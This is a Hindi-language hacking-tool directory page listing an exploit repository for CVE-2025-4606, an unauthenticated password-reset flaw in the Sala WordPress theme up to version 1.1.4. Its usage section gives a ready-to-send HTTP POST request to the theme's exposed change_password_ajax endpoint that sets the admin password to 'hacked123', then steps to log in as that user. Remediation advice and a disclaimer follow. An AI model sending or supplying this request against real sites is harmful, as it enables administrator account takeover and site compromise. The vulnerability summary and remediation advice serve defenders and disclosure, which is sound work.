Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/yucaerin/cve-2025-4606
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षा
GitHubyucaerin/cve-2025-4606

CVE-2025-4606

Sala - Startup & SaaS WordPress Theme <= 1.1.4 - अनधिकृत विशेषाधिकार वृद्धि पासवर्ड रीसेट/खाता अधिग्रहण के माध्यम से

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4606- WordPress Sala थीम <= 1.1.4 - पासवर्ड रीसेट/खाता अधिग्रहण के माध्यम से अप्रमाणित विशेषाधिकार वृद्धि

🔥 कमजोरी सारांश
WordPress थीम Sala संस्करण <= 1.1.4 एक अप्रमाणित विशेषाधिकार वृद्धि कमजोरी से ग्रस्त है। यह दोष अप्रमाणित हमलावरों को किसी भी उपयोगकर्ता — प्रशासकों सहित — का पासवर्ड रीसेट करने की अनुमति देता है, बिना अनुरोधकर्ता की पहचान सत्यापित किए, एक खुले AJAX एंडपॉइंट को सीधे आह्वान करके।

यह कमजोरी change_password_ajax फ़ंक्शन से उत्पन्न होती है जो wp_ajax_nopriv_ पर पंजीकृत है, जो बिना यह जांचे कि अनुरोध अधिकृत है या नहीं, किसी भी मान्य उपयोगकर्ता लॉगिन के लिए एक नया पासवर्ड सेट करता है।

🔍 प्रभावित थीम

  • थीम नाम: Sala – स्टार्टअप और SaaS WordPress थीम
  • प्रभावित संस्करण: <= 1.1.4
  • कमजोरी प्रकार: अप्रमाणित विशेषाधिकार वृद्धि
  • CVE ID: CVE-2025-4606
  • CVSS स्कोर: 9.8 (गंभीर)
  • प्रभाव: पूर्ण खाता अधिग्रहण (प्रशासक सहित)

🧪 शोषण सुविधाएँ

  • 🔓 कोई प्रमाणीकरण आवश्यक नहीं
  • 🔄 किसी भी उपयोगकर्ता का पासवर्ड ओवरराइट करता है एक मान्य लॉगिन नाम प्रदान करके
  • 📬 AJAX एंडपॉइंट को लक्षित करता है /wp-admin/admin-ajax.php?action=change_password_ajax
  • 🧠 तुरंत काम करता है यदि हमलावर एक मान्य उपयोगकर्ता नाम जानता है (जैसे, admin)

🧠 शोधकर्ता

  • क्रेडिट: Thai An

🚀 उपयोग

  1. लक्ष्य WordPress साइट पर एक मान्य उपयोगकर्ता नाम पहचानें। आप यह जाँच कर सकते हैं:

    • सार्वजनिक लेखक संग्रह URL (/author/username)
  2. उपयोगकर्ता का पासवर्ड रीसेट करने के लिए निम्नलिखित POST अनुरोध तैयार करें:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: targetsite.com
    Content-Type: application/x-www-form-urlencoded
    
    action=change_password_ajax&login=admin&new_password=hacked123
    
  3. यदि सफल होता है, तो आप लक्षित उपयोगकर्ता के रूप में नए पासवर्ड (उपरोक्त उदाहरण में hacked123) का उपयोग करके लॉग इन कर सकते हैं।

  4. /wp-login.php पर जाएँ और पहुँच सत्यापित करें।

🛠 सुधार अनुशंसाएँ

  • थीम डेवलपर्स को wp_ajax_nopriv_change_password_ajax हुक को हटाना या सुरक्षित करना चाहिए।
  • संवेदनशील कार्यों की अनुमति देने से पहले हमेशा is_user_logged_in() की जाँच करें और उपयोगकर्ता की पहचान सत्यापित करें।
  • CSRF और अप्रमाणित दुरुपयोग को रोकने के लिए nonce जाँच लागू करें।

🔒 अस्वीकरण:
यह जानकारी केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान की गई है। सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है।

📚 संदर्भ:

  • Wordfence सलाह
टूल डाउनलोड करें